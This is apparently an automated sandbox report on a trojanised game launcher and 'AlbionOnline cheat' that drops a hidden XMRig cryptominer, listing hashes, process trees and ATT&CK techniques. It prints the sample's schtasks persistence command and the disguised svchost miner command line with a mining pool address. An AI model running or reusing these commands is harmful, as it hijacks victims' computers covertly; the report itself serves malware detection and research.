xmrig | c0f2713b2cb88cbfc7b59f97876eaa064a9b43b4ec6cbb12bcd78e20e56f464a

Analysis

max time kernel
120s
max time network
158s
platform
windows10_x64
resource
win10v20210408
submitted
17-07-2021 22:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Cristalix/Cristalix_New_t.exe
Size

6.5MB
MD5

c2b39eba635ba5dc92c1a7aaf6999be3
SHA1

65800969eb6066c6d3632b176d2c7bb97664a69a
SHA256

e3bdbc55c8c0d6eb4c87bf3f3670fbb58d6ed8d87d5feb21b502298532a45fbb
SHA512

611cc6eaadb361cb4a37915c964778d5caa307027d406295cce41986133c682b1b446f65af156a1ab71c8aacda8934ac3cd29c51e0771340553eac3d6a1d5f61

Score

10^/10

xmrig miner

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner Payload 3 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/1020-151-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral2/memory/1020-152-0x00000001402EB66C-mapping.dmp	xmrig
behavioral2/memory/1020-154-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig

Executes dropped EXE 5 IoCs

Processes:

AlbionOnline cheat v0.1.2.exeCristalixLauncher-3.0.145.exesihost64.exeServices.exesihost64.exe

pid process

3568 AlbionOnline cheat v0.1.2.exe
3976 CristalixLauncher-3.0.145.exe
3944 sihost64.exe
3948 Services.exe
2364 sihost64.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Suspicious use of SetThreadContext 1 IoCs

Processes:

Services.exe

description pid process target process

PID 3948 set thread context of 1020 3948 Services.exe svchost.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

408 3036 WerFault.exe javaw.exe
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

796 schtasks.exe
1176 schtasks.exe

pid	process
3568	AlbionOnline cheat v0.1.2.exe
3976	CristalixLauncher-3.0.145.exe
3944	sihost64.exe
3948	Services.exe
2364	sihost64.exe

description	pid	process	target process
PID 3948 set thread context of 1020	3948	Services.exe	svchost.exe

pid	pid_target	process	target process
408	3036	WerFault.exe	javaw.exe

pid	process
796	schtasks.exe
1176	schtasks.exe

Suspicious behavior: EnumeratesProcesses 18 IoCs

Processes:

WerFault.exeAlbionOnline cheat v0.1.2.exeServices.exe

pid	process
408	WerFault.exe
408	WerFault.exe
408	WerFault.exe
408	WerFault.exe
408	WerFault.exe
408	WerFault.exe
408	WerFault.exe
408	WerFault.exe
408	WerFault.exe
408	WerFault.exe
408	WerFault.exe
408	WerFault.exe
408	WerFault.exe
408	WerFault.exe
3568	AlbionOnline cheat v0.1.2.exe
3568	AlbionOnline cheat v0.1.2.exe
3948	Services.exe
3948	Services.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

WerFault.exeAlbionOnline cheat v0.1.2.exeServices.exesvchost.exe

description	pid	process
Token: SeDebugPrivilege	408	WerFault.exe
Token: SeDebugPrivilege	3568	AlbionOnline cheat v0.1.2.exe
Token: SeDebugPrivilege	3948	Services.exe
Token: SeLockMemoryPrivilege	1020	svchost.exe
Token: SeLockMemoryPrivilege	1020	svchost.exe

Suspicious use of WriteProcessMemory 36 IoCs

Processes:

Cristalix_New_t.exeCristalixLauncher-3.0.145.exeAlbionOnline cheat v0.1.2.execmd.exeServices.execmd.exe

description	pid	process	target process
PID 664 wrote to memory of 3568	664	Cristalix_New_t.exe	AlbionOnline cheat v0.1.2.exe
PID 664 wrote to memory of 3568	664	Cristalix_New_t.exe	AlbionOnline cheat v0.1.2.exe
PID 664 wrote to memory of 3976	664	Cristalix_New_t.exe	CristalixLauncher-3.0.145.exe
PID 664 wrote to memory of 3976	664	Cristalix_New_t.exe	CristalixLauncher-3.0.145.exe
PID 664 wrote to memory of 3976	664	Cristalix_New_t.exe	CristalixLauncher-3.0.145.exe
PID 3976 wrote to memory of 3036	3976	CristalixLauncher-3.0.145.exe	javaw.exe
PID 3976 wrote to memory of 3036	3976	CristalixLauncher-3.0.145.exe	javaw.exe
PID 3568 wrote to memory of 3372	3568	AlbionOnline cheat v0.1.2.exe	cmd.exe
PID 3568 wrote to memory of 3372	3568	AlbionOnline cheat v0.1.2.exe	cmd.exe
PID 3372 wrote to memory of 796	3372	cmd.exe	schtasks.exe
PID 3372 wrote to memory of 796	3372	cmd.exe	schtasks.exe
PID 3568 wrote to memory of 3944	3568	AlbionOnline cheat v0.1.2.exe	sihost64.exe
PID 3568 wrote to memory of 3944	3568	AlbionOnline cheat v0.1.2.exe	sihost64.exe
PID 3568 wrote to memory of 3948	3568	AlbionOnline cheat v0.1.2.exe	Services.exe
PID 3568 wrote to memory of 3948	3568	AlbionOnline cheat v0.1.2.exe	Services.exe
PID 3948 wrote to memory of 508	3948	Services.exe	cmd.exe
PID 3948 wrote to memory of 508	3948	Services.exe	cmd.exe
PID 508 wrote to memory of 1176	508	cmd.exe	schtasks.exe
PID 508 wrote to memory of 1176	508	cmd.exe	schtasks.exe
PID 3948 wrote to memory of 2364	3948	Services.exe	sihost64.exe
PID 3948 wrote to memory of 2364	3948	Services.exe	sihost64.exe
PID 3948 wrote to memory of 1020	3948	Services.exe	svchost.exe
PID 3948 wrote to memory of 1020	3948	Services.exe	svchost.exe
PID 3948 wrote to memory of 1020	3948	Services.exe	svchost.exe
PID 3948 wrote to memory of 1020	3948	Services.exe	svchost.exe
PID 3948 wrote to memory of 1020	3948	Services.exe	svchost.exe
PID 3948 wrote to memory of 1020	3948	Services.exe	svchost.exe
PID 3948 wrote to memory of 1020	3948	Services.exe	svchost.exe
PID 3948 wrote to memory of 1020	3948	Services.exe	svchost.exe
PID 3948 wrote to memory of 1020	3948	Services.exe	svchost.exe
PID 3948 wrote to memory of 1020	3948	Services.exe	svchost.exe
PID 3948 wrote to memory of 1020	3948	Services.exe	svchost.exe
PID 3948 wrote to memory of 1020	3948	Services.exe	svchost.exe
PID 3948 wrote to memory of 1020	3948	Services.exe	svchost.exe
PID 3948 wrote to memory of 1020	3948	Services.exe	svchost.exe
PID 3948 wrote to memory of 1020	3948	Services.exe	svchost.exe

C:\Users\Admin\AppData\Local\Temp\Cristalix\Cristalix_New_t.exe
"C:\Users\Admin\AppData\Local\Temp\Cristalix\Cristalix_New_t.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:664

C:\Users\Admin\AppData\Local\Temp\AlbionOnline cheat v0.1.2.exe
"C:\Users\Admin\AppData\Local\Temp\AlbionOnline cheat v0.1.2.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3568

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"' & exit
3⤵
- Suspicious use of WriteProcessMemory
PID:3372

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"'
4⤵
- Creates scheduled task(s)
PID:796

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
3⤵
- Executes dropped EXE
PID:3944

C:\Users\Admin\AppData\Local\Temp\Services.exe
"C:\Users\Admin\AppData\Local\Temp\Services.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3948

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"' & exit
4⤵
- Suspicious use of WriteProcessMemory
PID:508

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"'
5⤵
- Creates scheduled task(s)
PID:1176

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
4⤵
- Executes dropped EXE
PID:2364

C:\Windows\System32\svchost.exe
C:\Windows/System32\svchost.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6065131 --pass=myminer --cpu-max-threads-hint=30 --donate-level=5 --cinit-idle-wait=4 --cinit-idle-cpu=80 --cinit-stealth
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1020

C:\Users\Admin\AppData\Local\Temp\CristalixLauncher-3.0.145.exe
"C:\Users\Admin\AppData\Local\Temp\CristalixLauncher-3.0.145.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3976

C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe
"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar "C:\Users\Admin\AppData\Local\Temp\CristalixLauncher-3.0.145.exe"
3⤵
PID:3036

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3036 -s 356
4⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:408

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\AlbionOnline cheat v0.1.2.exe
MD5
b46efcd7dbf7d2a57ca3e942fffb2214

SHA1
f8cf84367ce616c00e9966bd08d35084eec64010

SHA256
47955703a2e114e77ee02a35df2eae39cebddec17eaa924b9f343241dc9f17a7

SHA512
f5710091e28a80ef56f1cc37ff867282ca0b9086753d22066427c967130660971f86449cbac92bedb5403cb310a760e6d2bb13bc78e2198b973f304d65c0ea7f

Download Submit
C:\Users\Admin\AppData\Local\Temp\AlbionOnline cheat v0.1.2.exe
MD5
b46efcd7dbf7d2a57ca3e942fffb2214

SHA1
f8cf84367ce616c00e9966bd08d35084eec64010

SHA256
47955703a2e114e77ee02a35df2eae39cebddec17eaa924b9f343241dc9f17a7

SHA512
f5710091e28a80ef56f1cc37ff867282ca0b9086753d22066427c967130660971f86449cbac92bedb5403cb310a760e6d2bb13bc78e2198b973f304d65c0ea7f

Download Submit
C:\Users\Admin\AppData\Local\Temp\CristalixLauncher-3.0.145.exe
MD5
25b608146d97e46e5cb8d5d4a77440c5

SHA1
ed5d75d64744a971a7bdb79ba68f4eb0aa7d2cab

SHA256
8504825018e604414d2ebb1093cf249c2f1d56125f6f33a20b071d6a008b8dd9

SHA512
3ae601c91d804c4d6c402ba73263e5749fafdfe35d68d510dc3b632a85d897bb1dc0e48dee4710deaea5932bcf34deb9ca13d4c0c664848abca0372190fb38b9

Download Submit
C:\Users\Admin\AppData\Local\Temp\CristalixLauncher-3.0.145.exe
MD5
25b608146d97e46e5cb8d5d4a77440c5

SHA1
ed5d75d64744a971a7bdb79ba68f4eb0aa7d2cab

SHA256
8504825018e604414d2ebb1093cf249c2f1d56125f6f33a20b071d6a008b8dd9

SHA512
3ae601c91d804c4d6c402ba73263e5749fafdfe35d68d510dc3b632a85d897bb1dc0e48dee4710deaea5932bcf34deb9ca13d4c0c664848abca0372190fb38b9

Download Submit
C:\Users\Admin\AppData\Local\Temp\Services.exe
MD5
b46efcd7dbf7d2a57ca3e942fffb2214

SHA1
f8cf84367ce616c00e9966bd08d35084eec64010

SHA256
47955703a2e114e77ee02a35df2eae39cebddec17eaa924b9f343241dc9f17a7

SHA512
f5710091e28a80ef56f1cc37ff867282ca0b9086753d22066427c967130660971f86449cbac92bedb5403cb310a760e6d2bb13bc78e2198b973f304d65c0ea7f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Services.exe
MD5
b46efcd7dbf7d2a57ca3e942fffb2214

SHA1
f8cf84367ce616c00e9966bd08d35084eec64010

SHA256
47955703a2e114e77ee02a35df2eae39cebddec17eaa924b9f343241dc9f17a7

SHA512
f5710091e28a80ef56f1cc37ff867282ca0b9086753d22066427c967130660971f86449cbac92bedb5403cb310a760e6d2bb13bc78e2198b973f304d65c0ea7f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\WR64.sys
MD5
0c0195c48b6b8582fa6f6373032118da

SHA1
d25340ae8e92a6d29f599fef426a2bc1b5217299

SHA256
11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5

SHA512
ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
MD5
95099533bd1ac8cb7c824e9bc59a0891

SHA1
da546ebffa55004dbdf20f17a25a55f89a05f089

SHA256
066f3aaa8954a1692953a079afa3725823210bb773756bc37617f799dcb19772

SHA512
aa0749caa1002a608300ef355be44b09a2a0a845c8620cef2515d888f142633ab53ac8667da51e361f295f8d28e97e6d8b85580e99b8c00b971446d5fb3d3c35

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
MD5
95099533bd1ac8cb7c824e9bc59a0891

SHA1
da546ebffa55004dbdf20f17a25a55f89a05f089

SHA256
066f3aaa8954a1692953a079afa3725823210bb773756bc37617f799dcb19772

SHA512
aa0749caa1002a608300ef355be44b09a2a0a845c8620cef2515d888f142633ab53ac8667da51e361f295f8d28e97e6d8b85580e99b8c00b971446d5fb3d3c35

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
MD5
95099533bd1ac8cb7c824e9bc59a0891

SHA1
da546ebffa55004dbdf20f17a25a55f89a05f089

SHA256
066f3aaa8954a1692953a079afa3725823210bb773756bc37617f799dcb19772

SHA512
aa0749caa1002a608300ef355be44b09a2a0a845c8620cef2515d888f142633ab53ac8667da51e361f295f8d28e97e6d8b85580e99b8c00b971446d5fb3d3c35

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
MD5
95099533bd1ac8cb7c824e9bc59a0891

SHA1
da546ebffa55004dbdf20f17a25a55f89a05f089

SHA256
066f3aaa8954a1692953a079afa3725823210bb773756bc37617f799dcb19772

SHA512
aa0749caa1002a608300ef355be44b09a2a0a845c8620cef2515d888f142633ab53ac8667da51e361f295f8d28e97e6d8b85580e99b8c00b971446d5fb3d3c35

Download Submit
memory/508-141-0x0000000000000000-mapping.dmp

Download
memory/796-126-0x0000000000000000-mapping.dmp

Download
memory/1020-153-0x0000016CDA730000-0x0000016CDA750000-memory.dmp

Filesize
128KB

Download
memory/1020-151-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/1020-154-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/1020-152-0x00000001402EB66C-mapping.dmp

Download
memory/1176-142-0x0000000000000000-mapping.dmp

Download
memory/2364-144-0x0000000000000000-mapping.dmp

Download
memory/2364-156-0x0000000001280000-0x0000000001282000-memory.dmp

Filesize
8KB

Download
memory/3036-122-0x0000000000000000-mapping.dmp

Download
memory/3372-125-0x0000000000000000-mapping.dmp

Download
memory/3568-124-0x0000000001E00000-0x0000000001E02000-memory.dmp

Filesize
8KB

Download
memory/3568-123-0x000000001D750000-0x000000001D96B000-memory.dmp

Filesize
2.1MB

Download
memory/3568-114-0x0000000000000000-mapping.dmp

Download
memory/3568-117-0x0000000000EE0000-0x0000000000EE1000-memory.dmp

Filesize
4KB

Download
memory/3944-139-0x0000000000C30000-0x0000000000C32000-memory.dmp

Filesize
8KB

Download
memory/3944-137-0x00000000008E0000-0x00000000008E2000-memory.dmp

Filesize
8KB

Download
memory/3944-131-0x00000000000E0000-0x00000000000E1000-memory.dmp

Filesize
4KB

Download
memory/3944-127-0x0000000000000000-mapping.dmp

Download
memory/3948-130-0x0000000000000000-mapping.dmp

Download
memory/3948-150-0x00000000038E0000-0x00000000038EA000-memory.dmp

Filesize
40KB

Download
memory/3948-143-0x00000000038C0000-0x00000000038C1000-memory.dmp

Filesize
4KB

Download
memory/3948-140-0x000000001DA02000-0x000000001DA03000-memory.dmp

Filesize
4KB

Download
memory/3976-118-0x0000000000000000-mapping.dmp

Download